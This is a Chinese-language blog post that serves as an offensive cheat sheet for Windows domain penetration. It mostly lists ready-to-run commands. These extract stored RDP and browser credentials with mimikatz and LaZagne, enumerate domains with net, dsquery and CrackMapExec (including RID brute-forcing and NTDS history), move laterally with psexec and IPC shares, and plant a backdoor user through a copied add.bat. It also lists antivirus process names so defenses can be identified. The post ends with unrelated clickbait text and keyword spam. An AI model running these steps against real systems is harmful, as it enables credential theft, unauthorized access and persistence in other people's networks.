域滲透突破方式

內網滲透的本質就是信息收集

獲取windows遠程桌面 連接記錄

cmdkey /list # 查看mstsc的連接紀錄

查找本地的Credentials:

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

使用mimikatz進行操作:

mimikatz:

dpapi::cred/in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\92FB159ED290FC523E845094404697A8

域登錄日誌&遠程登錄日誌

域日誌位置

C:\Windows\System32\winevt\Logs\Security.evtx 服務器登錄日誌 登錄事件ID 4624,可判別出登錄域控制器的機器

c:\windows\system32\winevt\logs\*.remote* 遠程登錄日誌

主機遠程登錄日誌

HKCU\Software\Microsoft\Terminal Server Client\Servers

HKCU\Software\Microsoft\Terminal Server Client\Default

瀏覽器相關

chrome:

// chrome記住密碼保存的數據庫位置

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

firefox:

%appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\logins.json

%appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\key3.db

%appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\place.sqlite

psexec

psexec針對遠程建立連接的認證方式有兩種,一種先建立ipc連接,然後直接用psexec \10.10.10.10 cmd命令開啟一個半交互式的cmdshell,另一種是在psexec的參數中指定賬號密碼。

psexec \\10.10.10.10 c:\file.bat

SPN掃描

    spn原理是通過ldap協議向域控制器進行查詢,只要活得一個普通的域用戶,就可以spn掃描

Win 方式

C:\Windows\system32>setspn -T domain -q */*  # win自帶命令完成掃描
或  setspn  -Q  */*

Find-PSServiceAccounts.ps1。// 發現包含弱密碼的服務

其他腳本說明:

ps腳本 :https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-

psloggedon.exe

    查看本地登陸的用戶和通過本地計算機或遠程計算機登陸過的用戶。如果指定的是用戶名而不是計算機名,程序會搜索網上鄰居中的計算機。原理是通過檢查註冊表HKEY_USERS的key值來查詢誰登陸過。某些功能需要管理權限

下載:https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon

LaZagne(非常好用!)

    這裏再介紹LaZagne一個收集密碼工具-LaZagne,每個軟件都使用不同的技術(純文本,API,自定義算法,數據庫等)存儲其密碼,這個工具是用來獲取存儲在本地計算機上的密碼,諸如瀏覽器密碼等等

    工具地址:https://github.com/AlessandroZ/LaZagne

常見殺毒軟件的進程

ZhuDongFangYe.exe360主動防禦

KSafeTray.exe金山衛士

McAfee McShield.exeMcAfee

Egui.exeNOD32

AVP.exe 卡巴斯基

avguard.exe小紅傘

Bdagent.exeBitDefender

CrackMapExec(信息收集)

參考:https://www.secpulse.com/archives/53474.html

列出共享

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –shares

列出會話

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –sessions

列出磁盤信息

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –disks

列出登錄的用戶

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –loggedon-users

列出域用戶

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –users

根據唯一的RID列出所有的用戶

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –rid-brute

列出域組

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –groups

列出本地組

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –local-groups

列出域密碼策略

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –pass-pol

嘗試空會話

cme smb 192.168.127.235 -u ” -p ”

列出指定域信息

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ -d LABNET

列出ntds.dit的歷史信息

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –ntds-history

爬行C盤目錄信息

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –spider C\$ –pattern txt

cme smb 192.168.127.235 -u admin -p ‘xxxeeee’ –spider C\$

域滲透常用命令表(沒事看看)   

最後放一個域滲透常用命令表,沒事就來看看。滲透中忘了也可以來查查。

net user /domain // 查詢域用戶

net group /domain // 查詢域裏面的工作組

net group “domain admins” /domain // 查詢域管理員用戶組

net localgroup administrators /domain //登錄本機的域管理員

net group “domain controllers” /domain // 查看域控制器(如果有多台)

mstsc /admin //遠程桌面登錄到 console 會話解決 hash 無法抓出問題

nltest /dsgetdc:域名 //查詢域控主機名。如 nltest /dclist:bk

nltest /domain_trusts //可以列出域之間的信任關係

net view /domain:Secwing查看 Secwing 域中計算機列表

net time /domain //判斷主域,主域服務器都做時間服務器

net config workstation // 當前登錄域

net group “enterprise admins” /domain 企業管理組

net user /domain domain@qq.com test //修改域用戶密碼

dsquery computer domainroot -limit 65535 && net group “domain computers” /domain  //列出該域內所有機器名

dsquery user domainroot -limit 65535 && net user /domain //列出該域內所有用戶名

dsquery subnet //列出該域內網段劃分

dsquery group && net group /domain //列出該域內分組

dsquery ou //列出該域內組織單位

dsquery server && net time /domain //列出該域內域控制器

net use \\192.168.0.0 Passw0rd! /user:admin     //建立 ipc 連接

copy add.bat \\192.168.0.0\c$\wmpub     //複製 add.bat 到目標 C 盤 wmpub 目錄

add.bat 裏面的內容是 net userTwi1ight Passw0rd! /add     //添加 Twi1ight 用戶

at \\192.168.0.0     //查看目標的計劃任務列表

兩個人的愛情容不下三個人,容易翻車

點擊進入查看全文>

兩個人的愛情容不下三個人,容易翻車點擊進入查看全文>汽車銷售,佔山為王,三觀超正,社會工作,劫富濟貧,廣告公司,和平分手,第三個人,男朋友,愛情故事,長大后,白日夢,我也是,談戀愛,兩個人,勇往直前,爺爺奶奶,浪費時間,男女朋友,轉眼間,長大了,為什麼,成不了,不後悔,傻傻的,就是我,別人的,好孩子,好朋友,看電影,在一起,做生意,有一天,打電話,成年人

发表评论

%d 博主赞过: